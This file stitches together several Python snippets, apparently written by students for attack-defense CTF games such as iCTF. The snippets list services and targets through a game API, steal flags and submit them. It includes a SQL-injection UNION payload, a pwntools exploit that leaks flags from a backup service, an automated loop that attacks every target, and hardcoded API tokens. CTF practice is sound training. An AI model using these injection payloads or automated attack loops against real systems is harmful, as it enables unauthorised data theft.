class PCTFAPI():
__slots__ = ('team')
def __init__(self, game_url, team_token):
self.team = Team(game_url, team_token)
def getServiceNames(self):
service_ids = []
services = self.team.get_service_list()
for service in services:
service_ids.append(service['service_id'])
return service_ids
def getTargets(self, service):
targets = self.team.get_targets(service)
return targets
def getFLG(self, hostname, flagID):
kid_url = 'http://' + hostname + ':10003/kid'
print('Send request to: ' + kid_url)
sql_injection = "%' UNION SELECT description AS data from parties where id=" + flagID + "; --"
payload = {'first': 'Hong', 'last': sql_injection, 'age': 30}
try:
r = requests.get(kid_url, params=payload)
res = r.text
kid_id = res.split()[2]
print(res)
print(kid_id)
find_url = 'http://' + hostname + ':10003/find'
print('Send request to: ' + find_url)
find_params = {'kid': kid_id}
find_r = requests.get(find_url, params=find_params)
find_res = find_r.text
flag = find_res.split()[5]
print(find_res)
print(flag)
return flag
except:
return None
def submitFlag(self, flags):
if not isinstance(flags, list):
flags = [flags]
status = self.team.submit_flag(flags)
for i, s in enumerate(status):
print("Flag %s submission status: %s" % (flags[i], s))
return status
class PCTFAPI():
__slots__ = ('team')
def __init__(self, game_url, team_token):
self.team = Team(game_url, team_token)
def getServiceNames(self):
service_ids = []
services = self.team.get_service_list()
for service in services:
service_ids.append(service['service_id'])
return service_ids
def getTargets(self, service):
targets = self.team.get_targets(service)
return targets
def getFlag(self):
#TODO: implement the getFlag logic.
flag = 'dummy flag'
return flag
def submitFlag(self, flags):
if not isinstance(flags, list):
flags = [flags]
status = self.team.submit_flag(flags)
for i, s in enumerate(status):
print("Flag %s submission status: %s" % (flags[i], s))
return status
from swpag_client import Team
t = Team("http://actf0.cse545.rev.fish/", "IeaL1xdIryga0Ubazn2Zi2Sh3Gf47RdN")
print(t.game_url)
#print(t.get_vm())
print(t.get_game_status())
print(t.get_service_list())
#t.get_targets(service_id)
services = t.get_service_list()
print('services:', services)
print()
for service in services:
print('SERVICE NAME:', service)
targets = t.get_targets(service_id)
for target in targets:
print('TARGET NAME:', target)
def attack_svc7(flag_id):
print("running attack on service 7, flag id:", flag_id)
flag = ""
return flag
# NOTE: update this whitelist for the attack functions above.
# So we don't waste time executing stuff that's not done.
implemented_attack_functions = {2}
attack_functions = [
None, attack_svc1, attack_svc2, attack_svc3, attack_svc4, attack_svc5,
attack_svc6, attack_svc7
]
team = Team("http://52.53.64.114", "C3U6ooCuCLGoTgzOqoO3")
services = team.get_service_list()
service_flag_ids = dict()
while True:
for service in services:
if service['service_id'] not in implemented_attack_functions:
print("skipping service", service['service_id'],
", attack function not implemented")
continue
print("Going to attack", service['service_name'])
if service['service_name'] not in service_flag_ids:
service_flag_ids[service['service_name']] = set()
targets = team.get_targets(service['service_id'])
for target in targets:
if not target["team_name"].startswith("fos_"):
continue
class ProjectCTFAPI():
# This is just a simple wrapper class
# See client.py for more methods supported by self.team
__slots__ = ('team', 'debug')
"""
The Team class is your entrypoint into the API
"""
def __init__(self, gameIp, teamToken):
self.debug = False
self.team = Team(gameIp, teamToken)
"""
This returns all of the service ids in the game
"""
def getServices(self):
ids = []
services = self.team.get_service_list()
if self.debug:
print("~" * 5 + " Service List " + "~" * 5)
for s in services:
ids.append(s['service_id'])
if self.debug:
print("Service %s: %s\n\t'%s'" %
(s['service_id'], s['service_name'], s['description']))
return ids
"""
This returns a list of targets (ports, ips, flag ids) for the given service id
"""
def getTargets(self, service):
targets = self.team.get_targets(service)
if self.debug:
print("~" * 5 + " Targets for service %s " % service + "~" * 5)
for t in targets:
for key in ['hostname', 'port', 'flag_id', 'team_name']:
print("%10s : %s" % (key, t[key]))
print("\n")
return targets
"""
Submit an individual flag "FLGxxxxxxxx" or list of flags ["FLGxxxxxxxxx", "FLGyyyyyyyy", ...]
"""
def submitFlag(self, oneOrMoreFlags):
if not isinstance(oneOrMoreFlags, list):
oneOrMoreFlags = [oneOrMoreFlags]
status = self.team.submit_flag(oneOrMoreFlags)
if self.debug:
for i, s in enumerate(status):
print("Flag %s submission status: %s" % (oneOrMoreFlags[i], s))
return status
from swpag_client import Team
import sys
from time import sleep
import subprocess
TICK = 30
MAX_SIZE = 100
exploit = sys.argv[2]
service = sys.argv[1]
t = Team("http://teaminterface.ictf.love/", "g7iCTu9Gt6pj1DCG4XwP")
services = t.get_service_list()
print(services)
if service not in services:
raise Exception("Check service name")
while True:
targets = ["diocane"]
targets = t.get_targets(service)
for target in targets:
flags = subprocess.check_output([exploit,
target]).decode("utf-8").split("\n")
if len(flags) > MAX_SIZE:
list_of_flags = [flags[:MAX_SIZE], flags[MAX_SIZE:]]
else:
list_of_flags = [flags]
print(list_of_flags)
for max_flags in list_of_flags:
t.submit_flags(max_flags)
class PCTFAPI():
__slots__ = ('team')
def __init__(self, game_url, team_token):
self.team = Team(game_url, team_token)
def getServiceNames(self):
service_ids = []
services = self.team.get_service_list()
for service in services:
service_ids.append(service['service_id'])
return service_ids
def getTargets(self, service):
targets = self.team.get_targets(service)
return targets
def getFLG(self, hostname, flagID):
try:
r = remote(hostname, 10001)
except:
print(hostname + ' is down ')
return None
r.sendline('2')
r.sendline(flagID)
r.sendline('*')
rl = r.recvall(timeout=1)
decoded_str = ''
try:
decoded_str = rl.decode('utf-8')
print(decoded_str)
except:
print('bad response')
return None
m = re.search('FLG[0-9A-Za-z]{13}', decoded_str)
if m == None:
r.close()
return None
FLG = m.group(0)
print('captured the flag')
print(FLG)
r.close()
return FLG
def submitFlag(self, flags):
if not isinstance(flags, list):
flags = [flags]
status = self.team.submit_flag(flags)
for i, s in enumerate(status):
print("Flag %s submission status: %s" % (flags[i], s))
return status
from swpag_client import Team
from pprint import pprint
t = Team("http://api.ictf2019.net/", "lVTU84h3IsWsv5Qa48Wv")
pprint(t.get_service_list())
with open('services.txt', 'w') as fout:
pprint(t.get_service_list(), fout)
class ProjectCTFAPI():
# This is just a simple wrapper class
# See client.py for more methods supported by self.team
__slots__ = ('team', 'debug')
"""
The Team class is your entrypoint into the API
"""
def __init__(self, gameIp, teamToken):
self.debug = False
self.team = Team(gameIp, teamToken)
"""
This returns all of the service ids in the game
"""
def getServices(self):
ids = []
services = self.team.get_service_list()
if self.debug:
print("~" * 5 + " Service List " + "~" * 5)
for s in services:
ids.append(s['service_id'])
if self.debug:
print("Service %s: %s\n\t'%s'" %
(s['service_id'], s['service_name'], s['description']))
return ids
"""
This returns a list of targets (ports, ips, flag ids) for the given service id
"""
def getTargets(self, service):
targets = self.team.get_targets(service)
if self.debug:
print("~" * 5 + " Targets for service %s " % service + "~" * 5)
for t in targets:
for key in ['hostname', 'port', 'flag_id', 'team_name']:
print("%10s : %s" % (key, t[key]))
print("\n")
return targets
"""
Submit an individual flag "FLGxxxxxxxx" or list of flags ["FLGxxxxxxxxx", "FLGyyyyyyyy", ...]
"""
def submitFlag(self, oneOrMoreFlags):
if not isinstance(oneOrMoreFlags, list):
oneOrMoreFlags = [oneOrMoreFlags]
status = self.team.submit_flag(oneOrMoreFlags)
if self.debug:
for i, s in enumerate(status):
print("Flag %s submission status: %s" % (oneOrMoreFlags[i], s))
return status
def getFLG(self, hostname, flagID):
# Please change port id accordingly
r = remote(hostname, 20003)
#below is the exploit of Backup service of CTF3
# Please change the exploit interaction accordingly
r.sendline('2')
r.sendline(flagID)
r.sendline('*')
# Receive data from victim service
# Use python regular expression to search flag
rl = r.recvall(timeout=1)
m = re.search('FLG[0-9A-Za-z]{13}', rl)
# If no flag (service is patched), then close the remote connection and return none
if m == None:
r.close()
return None
# If find flag, print it, close the connection and send the flag back to main.
FLG = m.group(0)
print FLG
r.close()
return FLG
